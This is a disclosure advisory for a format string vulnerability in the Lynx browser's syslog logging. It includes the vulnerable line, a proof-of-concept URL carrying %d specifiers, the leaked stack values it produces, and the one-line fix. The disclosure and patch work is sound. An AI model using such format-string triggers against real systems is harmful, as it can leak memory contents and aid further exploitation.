Lynx v2.8.5dev Format String Vulnerablity

2018.09.27

Larry W. Cashdollar (US)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Title: Format String Vulnerablity in Lynx
Author: Larry W. Cashdollar, @_larry0
Date: 2001-12-27
CVE-ID:
Download Site: http://lynx.browser.org/
Vendor: Lynx
Vendor Notified: 2001-12-27
Vendor Contact: bugtraq
Advisory: http://www.vapid.dhs.org/advisories/lynx_format_string_vulnerability.html
Description: Lynx is a text browser for the World Wide Web
Vulnerability:
lynx has a format string vulnerability in LYUtils.c line 7995 due to a bad call to syslog(), where the format argument is omitted.
Risk: Low
Version: Lynx compiled from FreeBSD ports collection. Also tested in 2.8.5dev.5.gz
[larryc@harod ~ $] lynx --version
Lynx Version 2.8.4rel.1 (17 Jul 2001)
Built on freebsd4.4 Dec 25 2001 23:04:31
Details
line 7995 in LYUtils.c reads:
syslog (LOG_INFO|LOG_LOCAL5, buf);
The reason this is low priority is the bug can only big triggered if sysloging URL's is enabled.
(./configure --enable-syslog)
Export: JSON TEXT XML
Exploit Code:
The following url triggers the bug:
[larryc@harod ~ $] lynx http://lwc%d%d:hsVd632k@vapid.dhs.org/bleh:80
Results in the following logged to syslog.
Dec 25 23:11:00 vapid lynx[5160]: http://lwc-1077939384134744128:******@vapid.dhs.org/bleh:80
Fix
line 7995: --syslog (LOG_INFO|LOG_LOCAL5, buf); +syslog (LOG_INFO|LOG_LOCAL5,"%s", buf);

References:

http://www.vapidlabs.com/advisory.php?v=74

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Lynx v2.8.5dev Format String Vulnerablity

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.